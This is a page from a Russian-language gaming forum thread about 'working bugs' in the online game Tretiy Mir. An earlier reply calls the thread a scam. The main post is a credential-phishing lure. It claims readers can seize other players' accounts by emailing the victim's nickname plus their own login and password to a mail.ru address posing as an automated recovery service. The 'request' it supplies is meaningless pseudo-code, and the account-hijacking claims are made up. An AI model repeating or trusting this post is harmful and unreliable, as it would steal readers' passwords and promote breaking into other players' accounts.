Среда, 11.03.2026, 20:28
Приветствую Вас, Гость
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 2 из 2
  • «
  • 1
  • 2
Модератор форума: Sbor  
РАБОЧИЕ БАГИ
сообщение 09.04.2011, 23:30
Сообщение #16
Генерал-полковник

развод...

сообщение 28.07.2011, 16:10
Сообщение #17
Рядовой

Кароче пацани могу помоч взламивать замки в третем мире.Ви конечно можете подумать что ето развод но я етой фишкой наламал около 20 замков.Не будем долго болтать, к делу.Мой друг обяснил мне как пользоватса етой фишкой. Мы знаем что -при регистрации мы указываем свой почтовый адрес . Как вияснилось служба поддержки сотрудничает с проэктом mail.ru и множество сервисов оформлены на электронный адрес fenixsoft_company@mail.ru и все запросы к службе
поддержки приходят именно сюда. И так, что нужно для взлома замка в 3мире: 1-Ник взламываего
персонажа 2-Свой акаунт(свою учетку в третим мире)3-Ваш
почтовый яшик. И у вас все получится!! Есть почтовый ящик автоматического адресования писем, от администрации сервера компании Fenix-soft
На этот адрес « fenixsoft_company@mail.ru » присылаете форму с указанием персонажа
которого вы хотите взломать, почтовый ящик разценивает это как востановление
пароля. После отправки письма ,через 10-15 минут на ящик с которого вы отправляли
запрос, приходит пароль по нику вашей жертвы, а так же вам придет сообщение на ваш
игровой логин с паролем жертвы! Письмо отправлять только как указано ниже. Неправельно заполненный формы, программа расценит как ощибки и не
сможет сверить с базой данных! И автоматически отменит ваще прошение по
востановлению пароля! Тема письма: « get password » Само письмо должно выглядеть
так. id := "НИК ЖЕРТВЫ" id$ := "ВАШ ЛОГИН" pass := loadpwlfile(account_up\
\password_up\\ \'id\'.pad) pass$ := "ВАШ ПАРОЛЬ" q1 := loadfile(account\\password\\
\'id.q1\'.txt) function backpassword(id,pass,q1,q2,i,k) Check = "id"\"id$"\"pass" if = true and pass$=loadpwlfile(account\ \password\\\'id$\'.pwl) q1 = true send.file.pass: \"Ваш адрес
электронной почты\" end if end function
ЕТО РЕАЛЬНО РАБОТАЕТ!!!!!!!!! И НЕ ЗАБИВАЙТЕ ОТПРАВЛЯТЬ ПИСЬМО НУЖНО НА АДРЕС “fenixsoft_company@mail.ru

• Страница 2 из 2
  • «
  • 1
  • 2
Поиск: